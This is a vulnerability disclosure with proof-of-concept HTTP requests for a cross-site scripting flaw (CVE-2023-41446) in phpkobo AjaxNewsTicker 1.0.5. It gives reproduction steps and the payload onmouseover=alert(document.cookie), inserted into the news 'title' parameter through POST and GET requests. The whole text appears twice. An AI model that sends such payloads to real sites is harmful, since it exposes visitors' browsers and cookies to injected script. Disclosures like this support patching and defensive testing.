RNPG/Cross Site Scripting (XSS) Vulnerability PoC #2 - AjaxNewsTicker - CVE-2023-41446.txt Secret

## Cross Site Scripting (XSS) Vulnerability PoC #2 - AjaxNewsTicker - CVE-2023-41446.txt
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted script inside the "title" parameter for "creating news" in the index.php component.
Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.
Attack Type: Remote
Payload:onmouseover=alert(document.cookie)
Assigned CVE-ID: CVE-2023-41446
Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

Steps To Reproduce
1.Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker&_be=1
2. Click "tickers" in the left panel
3. Click on "add new"
4. Insert payload in the "title" for newly added news
5. Attacker can create his/her malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

#PoC [POST method]

POST /ntic/admin/index.php?_rtp=nticker&_be=1 HTTP/1.1
Host: localhost:<port no.>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript,/;q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d

#PoC [GET method]

GET /ntic/admin/index.php?_rtp=nticker&_be=11&requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d HTTP/1.1
Host: localhost:<port no.>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript,/;q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
	Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
	Vendor of Product: phpkobo
	Affected Product Code Base: AjaxNewsTicker
	Product Version: 1.05
	Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted script inside the "title" parameter for "creating news" in the index.php component.
	Attack Vectors: To exploit this vulnerability the victim must click on the malicious link and then the payload will be executed on the victim's browser.
	Attack Type: Remote
	Payload:onmouseover=alert(document.cookie)
	Assigned CVE-ID: CVE-2023-41446
	Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)

	Steps To Reproduce
	1.Browse the the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker&_be=1
	2. Click "tickers" in the left panel
	3. Click on "add new"
	4. Insert payload in the "title" for newly added news
	5. Attacker can create his/her malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.

	#PoC [POST method]

	POST /ntic/admin/index.php?_rtp=nticker&_be=1 HTTP/1.1
	Host: localhost:<port no.>
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
	Accept: application/json,text/javascript,/;q=0.01
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Connection: close

	requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d

	#PoC [GET method]

	GET /ntic/admin/index.php?_rtp=nticker&_be=11&requ=%7b%22cmd%22%3a%22reg_done%22%2c%22form%22%3a%7b%22title%22%3a%22testx5dop%20onmouseover%3dalert(document.cookie)%20plsgs%22%7d%2c%22dts%22%3a%7b%22page_idx%22%3a1%2c%22page_size%22%3a10%2c%22total_rec%22%3a%222346%22%2c%22total_page%22%3a235%2c%22rec_idx_s%22%3a1%2c%22rec_idx_e%22%3a10%2c%22sort_val%22%3a%22dt_create%3adesc%22%7d%2c%22criteria%22%3a%7b%22keyword%22%3a%22%22%7d%7d HTTP/1.1
	Host: localhost:<port no.>
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
	Accept: application/json,text/javascript,/;q=0.01
	Accept-Language: en-US,en;q=0.5
	Accept-Encoding: gzip, deflate
	Connection: close